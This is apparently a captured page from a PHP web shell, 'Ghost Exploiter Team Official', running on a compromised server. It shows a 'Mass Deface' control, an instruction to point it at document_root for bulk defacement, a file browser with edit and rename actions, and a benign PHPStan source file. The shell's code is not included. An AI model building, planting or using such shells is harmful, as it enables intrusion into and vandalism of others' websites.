Ghost Exploiter Team Official
Mass Deface
Directory >>
/
var
/
www
/
html
/
back
/
vendor
/
phpstan
/
phpdoc-parser
/
src
/
Ast
/
PhpDoc
/
Doctrine
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
type
file
dir
+File/Dir
DoctrineAnnotation.php
1.005KB
edt
ren
DoctrineArgument.php
1.168KB
edt
ren
DoctrineArray.php
0.875KB
edt
ren
DoctrineArrayItem.php
1.353KB
edt
ren
DoctrineTagValueNode.php
1.02KB
edt
ren
<?php declare(strict_types = 1); namespace PHPStan\PhpDocParser\Ast\PhpDoc\Doctrine; use PHPStan\PhpDocParser\Ast\Node; use PHPStan\PhpDocParser\Ast\NodeAttributes; use function implode; class DoctrineArray implements Node { use NodeAttributes; /** @var list<DoctrineArrayItem> */ public array $items; /** * @param list<DoctrineArrayItem> $items */ public function __construct(array $items) { $this->items = $items; } public function __toString(): string { $items = implode(', ', $this->items); return '{' . $items . '}'; } /** * @param array<string, mixed> $properties */ public static function __set_state(array $properties): self { $instance = new self($properties['items']); if (isset($properties['attributes'])) { foreach ($properties['attributes'] as $key => $value) { $instance->setAttribute($key, $value); } } return $instance; } }